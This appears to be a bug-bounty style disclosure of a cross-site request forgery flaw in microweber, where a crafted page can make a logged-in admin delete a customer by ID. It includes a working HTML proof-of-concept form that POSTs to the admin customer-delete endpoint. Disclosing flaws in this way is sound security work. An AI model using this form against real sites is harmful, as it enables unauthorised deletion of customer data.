Cross-Site Request Forgery (CSRF) in microweber/microweberValid
Jul 30th 2021
Attacker able to delete any customer if knows the customer
ids parameter value.
🕵️♂️ Proof of Concept
Here after running PoC.html on Firefox or Safari and click on submit button (also can be auto-submit) you will see that the customer with id 2 has been deleted.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://demo.microweber.org/demo/admin/customers/delete" method="POST"> <input type="hidden" name="id" value="2" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Here a customer with id value 2 will be deleted after clicking on submit button. 📍 Location app.js#L1